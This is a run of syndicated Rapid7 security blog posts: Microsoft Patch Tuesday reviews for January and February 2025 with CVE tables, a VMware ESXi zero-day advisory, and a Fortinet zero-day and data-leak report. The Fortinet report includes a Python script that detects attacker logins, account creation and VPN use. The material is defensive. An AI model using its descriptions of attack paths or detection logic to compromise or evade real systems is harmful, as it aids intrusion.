| CVE-2025-24067 | Kernel Streaming Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-24076 | Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-24994 | Microsoft Windows Cross Device Service Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-25008 | Windows Server Elevation of Privilege Vulnerability | No | No | 7.1 |
| CVE-2025-24997 | DirectX Graphics Kernel File Denial of Service Vulnerability | No | No | 4.4 |

Multiple zero-day vulnerabilities in Broadcom VMware ESXi and other products

Post Syndicated from Stephen Fewer original https://blog.rapid7.com/2025/03/04/etr-multiple-zero-day-vulnerabilities-in-broadcom-vmware-esxi-and-other-products/

On Tuesday, March 4, 2025, Broadcom published a critical security advisory (VMSA-2025-0004) on 3 new zero-day vulnerabilities affecting multiple VMware products, including ESXi, Workstation, and Fusion. The most severe of the vulnerabilities is CVE-2025-22224, a critical vulnerability in ESXi and Workstation. Notably, these are not remotely exploitable vulnerabilities — they require an attacker to have existing privileged access on a VM that is running on an affected VMware hypervisor.

  • CVE-2025-22224 (CVSS 9.3): A Time-of-Check Time-of-Use (TOCTOU) vulnerability in VMware ESXi and Workstation that can lead to an out-of-bounds write condition. An attacker with local administrative privileges on a virtual machine could exploit this issue to execute code as the virtual machine’s VMX process running on the host.
  • CVE-2025-22225 (CVSS 8.2): An arbitrary write vulnerability in VMware ESXi that allows an attacker with privileges within the VMX process to trigger an arbitrary kernel write leading to an escape of the sandbox.
  • CVE-2025-22226 (CVSS 7.1): An information disclosure vulnerability in VMware ESXi, Workstation, and Fusion that arises from an out-of-bounds read in the Host Guest File System (HGFS). An attacker with administrative privileges to a virtual machine could exploit this issue to leak memory from the VMX process.

Broadcom has published an FAQ with additional information for VMware customers.

All 3 vulnerabilities were reported to Broadcom by Microsoft Threat Intelligence Center. Broadcom’s advisory indicates for all 3 CVEs that Broadcom “has information to suggest that exploitation has occurred in the wild.” Shortly after Broadcom published their advisory, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) added all 3 CVEs to the Known Exploited Vulnerabilities (KEV) list.

Based on the information in the advisory, it appears that the 3 vulnerabilities can be chained together: “This is a situation where an attacker who has already compromised a virtual machine’s guest OS and gained privileged access (administrator or root) could move into the hypervisor itself.”

There is no known public exploit code for any of the CVEs at time of publication. Nevertheless, given that ESXi hypervisors are popular targets for both financially motivated and state-sponsored adversaries, Rapid7 recommends applying vendor-supplied fixes on an expedited basis.

Affected products

The following products are vulnerable to CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226:

  • Broadcom VMware ESXi 7.0 and 8.0
  • Broadcom VMware Cloud Foundation 4.5.x and 5.x
  • Broadcom VMware Telco Cloud Platform 5.x, 4.x, 3.x, and 2.x
  • Broadcom VMware Telco Cloud Infrastructure 3.x and 2.x

The following products are vulnerable to CVE-2025-22224 and CVE-2025-22226:

  • Broadcom VMware Workstation 17.x

The following product is vulnerable to CVE-2025-22226:

  • Broadcom VMware Fusion 13.x

For the most complete information on affected and fixed versions, see Broadcom’s advisory and FAQ.

Rapid7 customers

InsightVM and Nexpose customers will be able to assess their exposure to CVE-2025-22224, CVE-2025-22225, and CVE-2025-22226 on Broadcom VMware ESXi hypervisors, Fusion, and Workstation products with vulnerability checks expected to be available in today’s (Tuesday, March 4) content release.

Patch Tuesday – February 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/02/11/microsoft-patch-tuesday/

Microsoft is addressing 56 vulnerabilities this February 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation for two of the vulnerabilities published today, which is reflected in CISA KEV. Microsoft is aware of public disclosure for two other vulnerabilities. This is now the fifth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of just three critical remote code execution (RCE) vulnerabilities. Eleven browser vulnerabilities have already been published separately this month, and are not included in the total.

Ancillary Function Driver: zero-day EoP

All versions of Windows receive patches today for CVE-2025-21418, a heap-based buffer overflow in the Windows Ancillary Function Driver (AFD). Successful exploitation leads to SYSTEM privileges. The AFD has been around for decades; it handles foundational networking functionality, so it is necessarily a kernel driver which interacts with a great deal of user-supplied input. It is perhaps not very shocking that AFD has been the site of a significant number of problems over the years: specifically, elevation of privilege (EoP) vulnerabilities. Microsoft is aware of existing exploitation in the wild, and with low attack complexity, low privilege requirements, and no requirement for user interaction, CVE-2025-21418 is one to prioritize for patching. The relatively low CVSSv3 base score of 7.8 and severity rating of Important may appear relatively mild; however, broad similarities exist between this vuln and CVE-2024-38193, which Rapid7 flagged as ripe for malware abuse on the day it was published, and which has subsequently been linked to exploitation by the North Korean state-associated threat actor tracked as Lazarus.

Windows Storage: zero-day EoP

Ever wanted to delete a file on a Windows box, but pesky permissions prevented you from achieving your goal? CVE-2025-21391 might be just what you need: an elevation of privilege (EoP) vulnerability in the Windows Storage service for which Microsoft is aware of exploitation in the wild. No user interaction is required, attack complexity is low, and the weakness is given as “CWE-59: Improper Link Resolution Before File Access”; but what are attackers hoping to achieve here? Although the advisory provides scant detail, and even offers some vague reassurance that “an attacker would only be able to delete targeted files on a system”, it would be a mistake to assume that the impact of deleting arbitrary files would be limited to data loss or denial of service. As long ago as 2022, ZDI researchers set out how a motivated attacker could parlay arbitrary file deletion into full SYSTEM access using techniques which also involve creative misuse of symbolic links.

NTLMv2 disclosure: zero-day spoofing

It’s almost surprising when any particular Patch Tuesday doesn’t involve plugging one or two holes through which NTLM hashes can leak. CVE-2025-21377 describes an NTLMv2 hash disclosure vulnerability where exploitation ultimately results in the attacker gaining the ability to authenticate as the targeted user. Minimal user interaction with a malicious file is required, including selecting, inspecting, or “performing an action other than opening or executing the file.” This trademark linguistic ducking and weaving may be Microsoft’s way of saying “if we told you any more, we’d give the game away.” Accordingly, Microsoft assesses exploitation as more likely. The advisory acknowledges researchers from 0patch by ACROS Security — who also reported last month’s NTLM hash disclosure zero-day vuln CVE-2025-21308 — as well as others from Securify and Cathay Pacific; this might be the first instance of an airline receiving credit for reporting a Microsoft zero-day vulnerability.

Surface: zero-day container escape

A wide array of Microsoft Surface machines are vulnerable to CVE-2025-21194 until patched, although the most recent Surface Pro 10 and 11 series are not listed as vulnerable. The vulnerability is described as a security feature bypass, and exploitation could lead to container escape from a UEFI host machine and compromise of the hypervisor. Surface devices receive updates via Windows Update, although the advisory also gives brief instructions for users who wish to apply the updates manually. Microsoft describes the vulnerability as publicly disclosed.

LDAP server: critical RCE

Any security advisory which lists multiple weakness types typically describes a complex vulnerability, and Windows LDAP critical remote code execution (RCE) CVE-2025-21376 is no exception. Successful exploitation requires an attacker to navigate multiple challenges, including winning a race condition. The prize: code execution on the Windows LDAP server. Although Microsoft seldom specifies the privilege level of code execution on LDAP server vulnerabilities, Rapid7 has noted previously that the LDAP service runs in a SYSTEM context, and that is the only safe assumption. All versions of Windows receive a patch.

DHCP client: critical RCE

Today sees the publication of a slightly mysterious critical RCE in the Windows DHCP Client Service. Exploitation of CVE-2025-21379 requires an attacker to intercept and potentially modify communications between the Windows DHCP client and the requested resource, which implies either that an attacker can break encryption, or that no encryption is present in the DHCP communication; this risk is highlighted in Microsoft’s own spec for DHCP implementation.

Excel: critical RCE

As if spreadsheets weren’t dangerous enough by themselves, today sees publication of CVE-2025-21381, a critical RCE in Excel. As usual for this class of attack, the advisory clarifies that “remote” in this case refers to the location of the attacker, since user interaction is required, and the code execution will be in the context of the user on their local machine. The Outlook Preview Pane is an attack vector, so simply glancing at an email containing a specially crafted malicious spreadsheet is enough for the attack to succeed, although an attacker could also convince a user to download and open a file from a website, or perhaps simply drop a few USB sticks in the parking lot.

Microsoft lifecycle update

In Microsoft product lifecycle news, SQL Server 2019 moves from mainstream support to extended support on 2025-02-28.

Summary charts

[Summary charts: Patch Tuesday - February 2025]

Summary tables

Apps vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21322 | Microsoft PC Manager Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-21259 | Microsoft Outlook Spoofing Vulnerability | No | No | 5.3 |

Azure vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21198 | Microsoft High Performance Compute (HPC) Pack Remote Code Execution Vulnerability | No | No | 9 |
| CVE-2025-21188 | Azure Network Watcher VM Extension Elevation of Privilege Vulnerability | No | No | 6 |

Browser vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21342 | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21408 | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21279 | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 6.5 |
| CVE-2025-21283 | Microsoft Edge (Chromium-based) Remote Code Execution Vulnerability | No | No | 6.5 |
| CVE-2025-21253 | Microsoft Edge for IOS and Android Spoofing Vulnerability | No | No | 5.3 |
| CVE-2025-21267 | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 4.4 |
| CVE-2025-21404 | Microsoft Edge (Chromium-based) Spoofing Vulnerability | No | No | 4.3 |
| CVE-2025-0451 | Chromium: CVE-2025-0451 Inappropriate implementation in Extensions API | No | No | N/A |
| CVE-2025-0445 | Chromium: CVE-2025-0445 Use after free in V8 | No | No | N/A |
| CVE-2025-0444 | Chromium: CVE-2025-0444 Use after free in Skia | No | No | N/A |

Developer Tools vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21206 | Visual Studio Installer Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-24042 | Visual Studio Code JS Debug Extension Elevation of Privilege Vulnerability | No | No | 7.3 |
| CVE-2025-24039 | Visual Studio Code Elevation of Privilege Vulnerability | No | No | 7.3 |

Developer Tools Mariner vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2023-32002 | HackerOne: CVE-2023-32002 Node.js Module._load() policy Remote Code Execution Vulnerability | No | No | N/A |

Device vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21194 | Microsoft Surface Security Feature Bypass Vulnerability | No | Yes | 7.1 |

ESU Windows vulnerabilities

| CVE | Title | Exploited? | Publicly disclosed? | CVSSv3 base score |
|---|---|---|---|---|
| CVE-2025-21406 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21407 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21190 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21200 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21371 | Windows Telephony Service Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21201 | Windows Telephony Server Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21208 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21410 | Windows Routing and Remote Access Service (RRAS) Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21368 | Microsoft Digest Authentication Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21369 | Microsoft Digest Authentication Remote Code Execution Vulnerability | No | No | 8.8 |
| CVE-2025-21376 | Windows Lightweight Directory Access Protocol (LDAP) Remote Code Execution Vulnerability | No | No | 8.1 |
| CVE-2025-21359 | Windows Kernel Security Feature Bypass Vulnerability | No | No | 7.8 |
| CVE-2025-21373 | Windows Installer Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-21420 | Windows Disk Cleanup Tool Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-21418 | Windows Ancillary Function Driver for WinSock Elevation of Privilege Vulnerability | Yes | No | 7.8 |
| CVE-2025-21375 | Kernel Streaming WOW Thunk Service Driver Elevation of Privilege Vulnerability | No | No | 7.8 |
| CVE-2025-21181 | Microsoft Message Queuing (MSMQ) Denial of Service Vulnerability | No | No | 7.5 |
| CVE-2025-21419 | Windows Setup Files Cleanup Elevation of Privilege Vulnerability | No | No | 7.1 |
| CVE-2025-21377 | NTLM Hash Disclosure Spoofing Vulnerability | No | Yes | 6.5 |
| CVE-2025-21352 | Internet Connection Sharing (ICS) Denial of Service Vulnerability | No | No | 6.5 |
| CVE-2025-21347 | Windows Deployment Services Denial of Service Vulnerability | No | No | 6 |
| CVE-2025-21350 | Windows Kerberos Denial of Service Vulnerability | No | No | 5.9 |
| CVE-2025-21337 | Windows NTFS Elevation of Privilege Vulnerability | No | No | 3.3 |

Microsoft Dynamics vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21177 Microsoft Dynamics 365 Sales Elevation of Privilege Vulnerability No No 8.7

Microsoft Office vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21400 Microsoft SharePoint Server Remote Code Execution Vulnerability No No 8
CVE-2025-21392 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-21397 Microsoft Office Remote Code Execution Vulnerability No No 7.8
CVE-2025-21381 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21386 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21387 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21390 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21394 Microsoft Excel Remote Code Execution Vulnerability No No 7.8
CVE-2025-21383 Microsoft Excel Information Disclosure Vulnerability No No 7.8
CVE-2025-24036 Microsoft AutoUpdate (MAU) Elevation of Privilege Vulnerability No No 7

Windows vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21367 Windows Win32 Kernel Subsystem Elevation of Privilege Vulnerability No No 7.8
CVE-2025-21358 Windows Core Messaging Elevation of Privileges Vulnerability No No 7.8
CVE-2025-21351 Windows Active Directory Domain Services API Denial of Service Vulnerability No No 7.5
CVE-2025-21182 Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability No No 7.4
CVE-2025-21183 Windows Resilient File System (ReFS) Deduplication Service Elevation of Privilege Vulnerability No No 7.4
CVE-2025-21391 Windows Storage Elevation of Privilege Vulnerability Yes No 7.1
CVE-2025-21379 DHCP Client Service Remote Code Execution Vulnerability No No 7.1
CVE-2025-21184 Windows Core Messaging Elevation of Privileges Vulnerability No No 7
CVE-2025-21414 Windows Core Messaging Elevation of Privileges Vulnerability No No 7
CVE-2025-21349 Windows Remote Desktop Configuration Service Tampering Vulnerability No No 6.8
CVE-2025-21212 Internet Connection Sharing (ICS) Denial of Service Vulnerability No No 6.5
CVE-2025-21216 Internet Connection Sharing (ICS) Denial of Service Vulnerability No No 6.5
CVE-2025-21254 Internet Connection Sharing (ICS) Denial of Service Vulnerability No No 6.5
CVE-2025-21179 DHCP Client Service Denial of Service Vulnerability No No 4.8

Fortinet firewalls hit with new zero-day attack, older data leak

Post Syndicated from Caitlin Condon original https://blog.rapid7.com/2025/01/16/etr-fortinet-firewalls-hit-with-new-zero-day-attack-older-data-leak/

Executive summary

Fortinet firewalls hit with new zero-day attack, older data leak

Rapid7 is investigating two separate events affecting Fortinet firewall customers:

  • Zero-day exploitation of CVE-2024-55591, an authentication bypass vulnerability in FortiOS and FortiProxy disclosed earlier this week. Successful exploitation could allow remote attackers to gain super-admin privileges via crafted requests to the Node.js websocket module.
  • A January 15, 2025 dark web post from a threat actor who looks to have published IPs, passwords, and configuration data from 15,000 FortiGate firewalls. The data leaked online appears to be several years old (2022). Rapid7 has not attributed any CVEs to the leaked data at this time.

FortiGate data leak

On Wednesday, January 15, 2025, a threat actor named “Belsen Group” published a trove of Fortinet FortiGate firewall data on the dark web, allegedly from 15,000 organizations. The data released included IP addresses, passwords, and firewall configuration information — a potentially significant risk for organizations whose data was leaked.

Security researcher Kevin Beaumont has an initial analysis of the leaked data, along with his assessment that the data leaked this week appears to be from 2022. After conducting our own outreach to potentially affected organizations, Rapid7 has also confirmed that at least some of the leaked data originated from 2022 incidents where customer firewalls were compromised. Based on Beaumont’s analysis and observations from our own investigations, it’s likely that the data dump published by the threat actor contains primarily or entirely older data.

Rapid7 has not attributed the data leak to a specific CVE at this time. Beaumont said his observations from incident responses indicate that CVE-2022-40684 (a Fortinet firewall zero-day flaw from 2022) may have been the initial access vector that allowed for the large-scale firewall data leak.

New Fortinet zero-day CVE also exploited in the wild

Separately, on Tuesday, January 14, 2025, Fortinet disclosed CVE-2024-55591, a new zero-day vulnerability affecting FortiOS and FortiProxy. Security firm Arctic Wolf had previously published a blog on threat activity targeting Fortinet firewall management interfaces exposed to the public internet, saying that “a zero-day vulnerability is likely” but an initial access vector had not been confirmed. According to Arctic Wolf, the campaign “involved unauthorized administrative logins on management interfaces of firewalls, creation of new accounts, SSL VPN authentication through those accounts, and various other configuration changes.”

Fortinet’s advisory for CVE-2024-55591 includes indicators of compromise (IOCs) and notes that the vulnerability was reported as exploited in the wild at time of disclosure. No individual or firm is explicitly credited for discovering the vulnerability in Fortinet’s advisory, and Fortinet has not confirmed that CVE-2024-55591 is the zero-day vulnerability Arctic Wolf speculated was being leveraged in the threat activity it observed.

Rapid7 MDR threat hunters have observed activity from IP addresses publicly attributed to the threat campaign targeting CVE-2024-55591, but our team has so far only noted connections consistent with scanning or reconnaissance activity and not exploitation.

Zero-day vulnerabilities in Fortinet FortiOS, the operating system that runs on FortiGate firewalls, have been a relatively common occurrence in recent years and have been leveraged in a wide range of financially motivated, state-sponsored, and other attacks. In addition to CVE-2024-55591, prominent FortiOS zero-day flaws have included:

Like CVE-2022-40684, CVE-2024-55591 is an authentication bypass using an alternate path or channel (CWE-288). While it does not currently appear likely that CVE-2024-55591 is the vulnerability that enabled the collection and release of FortiGate firewall configuration data on January 15, 2025, the vulnerability is nevertheless being exploited in the wild and should be treated with urgency.

Mitigation guidance

According to Fortinet’s advisory, the following products and versions are vulnerable to CVE-2024-55591:

  • Fortinet FortiOS 7.0.0 through 7.0.16 (fixed in 7.0.17 or above)
  • Fortinet FortiProxy 7.2.0 through 7.2.12 (fixed in 7.2.13 or above)
  • Fortinet FortiProxy 7.0.0 through 7.0.19 (fixed in 7.0.20 or above)

Per Fortinet, other versions of FortiOS (6.4, 7.2, 7.4, 7.6) and FortiProxy (2.0, 7.4, 7.6) are not affected. Customers should update to a fixed version immediately, without waiting for a regular patch cycle to occur, and review Fortinet’s IOCs to aid investigations into suspicious activity. Indicators include examples of administrative or local users added by adversaries.

Customers should also ensure that firewall management interfaces are not exposed to the public internet and limit IP addresses that can reach administrative interfaces. If your organization was impacted by the January 15, 2025 FortiGate firewall data leak, you should change administrative and local user passwords immediately. FortiOS also supports multi-factor authentication (MFA) for local user accounts, which Rapid7 strongly recommends implementing.
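The activity described above (unauthorized administrative logins on the management interface, creation of new accounts, SSL VPN authentication through those accounts) is the kind of thing FortiGate event logs can surface before IOC lists catch up. The following Python is an added example, not Rapid7’s or Fortinet’s code: it parses key="value" event-log lines in the general shape of FortiOS syslog output and flags three patterns. The sample lines are constructed for the example, and the exact field names (`logdesc`, `cfgpath`, `cfgobj`, `remip`, the `tunnel-up` action) are assumptions modelled on that format; check them against your own firewall’s output before relying on the rules.

```python
"""Triage FortiGate-style event logs for the attack pattern described in the post."""
import ipaddress
import re
from typing import Iterable

# Matches key=value pairs; values are either "quoted strings" or bare tokens.
_KV_RE = re.compile(r'(\w+)=("(?:[^"\\]|\\.)*"|\S+)')


def parse_fortios_line(line: str) -> dict:
    """Turn one key=value log line into a dict (surrounding quotes stripped)."""
    fields = {}
    for key, value in _KV_RE.findall(line):
        if value.startswith('"') and value.endswith('"'):
            value = value[1:-1]
        fields[key] = value
    return fields


def _src_ip_trusted(srcip: str, trusted_nets) -> bool:
    """True only if srcip parses and falls inside one of the allow-listed networks."""
    try:
        ip = ipaddress.ip_address(srcip)
    except ValueError:
        return False
    return any(ip in net for net in trusted_nets)


def triage(lines: Iterable[str], trusted_admin_cidrs, known_users) -> list:
    """Return (rule, user_or_object, source_ip) findings for three patterns.

    admin_login_untrusted_src: successful admin login from outside the
        management allow-list (the interface should not be reachable from there).
    account_created: a config change adding an object under system.admin or
        user.local, i.e. an administrative or local user being added.
    sslvpn_unknown_user: an SSL VPN tunnel for a user not in the known-user
        list, e.g. an account the attacker created moments earlier.
    """
    trusted_nets = [ipaddress.ip_network(c) for c in trusted_admin_cidrs]
    known = set(known_users)
    findings = []
    for line in lines:
        f = parse_fortios_line(line)
        if f.get("type") != "event":
            continue
        sub, user, src = f.get("subtype"), f.get("user", ""), f.get("srcip", "")
        if sub == "system" and f.get("action") == "login" and f.get("status") == "success":
            if not _src_ip_trusted(src, trusted_nets):
                findings.append(("admin_login_untrusted_src", user, src))
        elif sub == "system" and f.get("action") == "Add" and f.get("cfgpath") in ("system.admin", "user.local"):
            findings.append(("account_created", f.get("cfgobj", ""), src))
        elif sub == "vpn" and f.get("action") == "tunnel-up" and user not in known:
            findings.append(("sslvpn_unknown_user", user, f.get("remip", src)))
    return findings


# Constructed sample lines (not real firewall output); RFC 5737 test addresses.
SAMPLE_LOGS = [
    'date=2025-01-14 time=03:12:44 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="admin" ui="https(198.51.100.23)" method="https" '
    'srcip=198.51.100.23 dstip=192.0.2.1 action="login" status="success" '
    'msg="Administrator admin logged in successfully from https(198.51.100.23)"',
    'date=2025-01-14 time=03:13:02 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Object configured" user="admin" ui="https(198.51.100.23)" srcip=198.51.100.23 '
    'action="Add" cfgpath="system.admin" cfgobj="svc_backup" msg="Add system.admin svc_backup"',
    'date=2025-01-14 time=03:15:19 type="event" subtype="vpn" level="information" vd="root" '
    'logdesc="SSL VPN tunnel up" action="tunnel-up" tunneltype="ssl-tunnel" user="svc_backup" '
    'remip=198.51.100.23 msg="SSL tunnel established"',
    'date=2025-01-14 time=09:00:05 type="event" subtype="system" level="information" vd="root" '
    'logdesc="Admin login successful" user="netops" ui="ssh(10.10.0.5)" method="ssh" '
    'srcip=10.10.0.5 dstip=192.0.2.1 action="login" status="success" msg="ok"',
]


def demo() -> list:
    """Run the rules over the sample with a 10.10.0.0/16 management allow-list."""
    return triage(SAMPLE_LOGS, ["10.10.0.0/16"], ["netops", "alice"])


if __name__ == "__main__":
    for rule, who, ip in demo():
        print(f"{rule}: {who} from {ip}")
```

The first three sample lines reproduce the chain the post describes (login from an untrusted source, new admin object, VPN tunnel for that new account) and each produces a finding; the fourth, a login from inside the allow-list by a known user, is silent. If you already restrict management access with trusted hosts, the `admin_login_untrusted_src` rule should never fire, which makes it a cheap control-effectiveness check as well as a detection.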

Rapid7 customers

InsightVM and Nexpose customers can assess their exposure to CVE-2024-55591 with vulnerability checks available in the January 15, 2025 content release. Customers already have coverage for all other FortiOS vulnerabilities mentioned in this blog from past content releases.

Patch Tuesday – January 2025

Post Syndicated from Adam Barnett original https://blog.rapid7.com/2025/01/14/patch-tuesday-january-2025/

Patch Tuesday - January 2025

Microsoft is addressing 161 vulnerabilities this January 2025 Patch Tuesday. Microsoft has evidence of in-the-wild exploitation and/or public disclosure for eight of the vulnerabilities published today, with three listed on CISA KEV. This is now the fourth consecutive month where Microsoft has published zero-day vulnerabilities on Patch Tuesday without evaluating any of them as critical severity at time of publication. Today also sees the publication of nine critical remote code execution (RCE) vulnerabilities. Unusually, Microsoft has not yet published any browser vulnerabilities this month.

Access: triple zero-day RCE

Today sees the publication of three very similar zero-day Microsoft Access vulnerabilities: CVE-2025-21366, CVE-2025-21395, and CVE-2025-21186. In each case, Microsoft notes public disclosure, but does not claim evidence of exploitation in the wild. Successful exploitation leads to code execution via heap-based buffer overflow, and requires that an attacker convince the user to download and open a malicious file.

Curiously, in each case, one portion of the advisory FAQ describes the update protection as “blocking potentially malicious extensions from being sent in an email”, but the remainder of the advisory doesn’t clarify how this would prevent malicious activity. Typically, patches provide protection by blocking malicious files upon receipt of a malicious email attachment, rather than preventing a malicious attachment from being sent in the first place, since an attacker is free to send whatever they like from any system they control.

The FAQ does mention that users who would otherwise have interacted with a malicious attachment will instead receive a notification that there was an attachment but “it cannot be accessed”, which is perhaps the best play on words we’ve seen from MSRC in a while.

Hyper-V NT Kernel Integration VSP: triple zero-day EoP

Microsoft is addressing a trio of related Windows Hyper-V NT Kernel Integration VSP elevation of privilege vulnerabilities today: CVE-2025-21333, CVE-2025-21334, and CVE-2025-21335. Microsoft is aware of exploitation in the wild for all three, as seen on both the Microsoft advisories and CISA KEV. In each case, exploitation leads to SYSTEM privileges. The advisories are short on additional detail, beyond a brief acknowledgement of Anonymous — presumably an undisclosed party, rather than the hacktivist collective — on CVE-2025-21333.

While we can sometimes infer context from prior examples, in this case there aren’t any; there is no mention of Hyper-V NT Kernel Integration VSP in any vulnerability published by Microsoft, at least as far back as 2017. If we look back five years, CVE-2020-16885 does describe an elevation of privilege vulnerability in the Windows storage VSP driver, but there isn’t a lot to go on there either.

The Virtualization Service Provider (VSP) resides in the root partition of a Hyper-V instance, and provides synthetic device support to child partitions over the Virtual Machine Bus (VMBus): it’s the foundation of how Hyper-V allows the child partition to trick itself into thinking that it’s a real computer. Given that the entire thing is a security boundary, it’s perhaps surprising that no Hyper-V NT Kernel Integration VSP vulnerabilities have been acknowledged by Microsoft until today, but it won’t be at all shocking if more now emerge.

The advisories published today do not clarify whether the elevation of privilege is only to SYSTEM within the child partition, but container escape specialists will surely be hunting for exploits in this area.

Windows Themes: zero-day NTLM disclosure

Many enterprise users or even admins may not think about Windows Themes very often, but consider CVE-2025-21308: a spoofing vulnerability where successful exploitation leads to improper disclosure of an NTLM hash, which allows an attacker to impersonate the user from whom it was acquired. Microsoft does not have evidence of in-the-wild exploitation, but does note public disclosure.

The advisory FAQ dances around the exploitation methodology without explaining; what we learn is that once an attacker had somehow delivered a malicious file to the target system, a user would need to manipulate the malicious file, but not necessarily click or open it. Without further detail, we can only speculate, but it’s plausible that simply opening a folder containing the file in Windows Explorer — including the Downloads folder — or inserting a USB drive, would be enough to trigger the vulnerability and see your NTLM hash leak silently for collection by the threat actor.

Some good news: Microsoft has removed NTLMv1 support from Windows 11 24H2 and Server 2025 onwards. Less good: it has been a whole two months since Microsoft last patched a zero-day NTLM disclosure vulnerability; that flaw was within MSHTML/Trident, and Windows 11 24H2 and Server 2025 were still vulnerable, since NTLMv2 is still supported across the board.

On the advisory for CVE-2025-21308, Microsoft links to documentation describing a mitigation: restricting NTLM traffic. This is worth a look, since a representative of 0patch, the research organization credited with reporting the vulnerability, has confirmed that NTLMv2 is affected by CVE-2025-21308.

Windows Installer: zero-day EoP

Installing or updating software often requires elevated privileges, and researchers and threat actors have known this for a long time. The advisory for CVE-2025-21275 (which Microsoft titles as a Windows App Package Installer elevation of privilege; see the summary tables below) doesn’t weigh us down with lengthy explanations; it simply says that successful exploitation leads to SYSTEM privileges. Microsoft is aware of public disclosure of this vulnerability, but not in-the-wild exploitation.

CVE-2025-21275 is the latest in a long line of Windows Installer elevation of privilege vulnerabilities; Microsoft has now published 37 Windows Installer elevation of privilege vulnerabilities in total since the start of 2020, although only five of those have been zero-days, with only CVE-2024-38014 known by Microsoft to have been exploited prior to publication in September 2024.

PGM: critical RCE

Microsoft’s in-house research teams are a reliable source of vulnerability discovery in Microsoft products, and today we get patches for the self-discovered CVE-2025-21307, a critical RCE in the Windows Reliable Multicast Transport Driver (RMCAST) with a CVSSv3 base score of 9.8. The vulnerability is only exploitable on a system where a program is listening on a Pragmatic General Multicast (PGM) port.

In 2025, you might very well expect that any service that a major commercial operating system exposes to the network would provide at least some form of authentication capability, but if so, prepare to be disappointed by the Windows implementation of PGM. The concept was first described in RFC 3208, which was published in 2001 in an Experimental state and stayed that way. As Microsoft themselves put it, “the PGM specification [RFC3208] is ambiguous in a number of areas”.

Given the lack of required user interaction and remote attack vector for CVE-2025-21307, it’s well worth asking yourself: does our firewall allow a PGM receiver to receive inbound traffic from the public internet? If so, the second-best time to prevent that is right now.

OLE: critical RCE

Outlook admins who force their users to read emails in plain text only can skip this paragraph, but everyone else should be aware of CVE-2025-21298, a Windows Object Linking and Embedding (OLE) critical RCE with a CVSSv3 base score of 9.8. The eternal threat of the malicious inbound email finds expression again here; just previewing the wrong email in Outlook is all it takes for an attacker to achieve code execution in the context of the user. All versions of Windows receive a patch.

Microsoft lifecycle update

In Microsoft product lifecycle news, Visual Studio 2022 17.6 LTSC receives its last update today.

Summary Charts

Windows Telephony Service looming large this month

Summary tables

Azure vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21380 Azure Marketplace SaaS Resources Information Disclosure Vulnerability No No 8.8
CVE-2025-21403 On-Premises Data Gateway Information Disclosure Vulnerability No No 6.4

Developer Tools vulnerabilities

CVE Title Exploited? Publicly disclosed? CVSSv3 base score
CVE-2025-21178 Visual Studio Remote Code Execution Vulnerability No No 8.8
CVE-2025-21176 .NET, .NET Framework, and Visual Studio Remote Code Execution Vulnerability No No 8.8
CVE-2025-21172 .NET and Visual Studio Remote Code Execution Vulnerability No No 7.5
CVE-2025-21171 .NET Remote Code Execution Vulnerability No No 7.5
CVE-2024-50338 GitHub: CVE-2024-50338 Malformed URL allows information disclosure through git-credential-manager No No 7.4
CVE-2025-21405 Visual Studio Elevation of Privilege Vulnerability No No 7.3
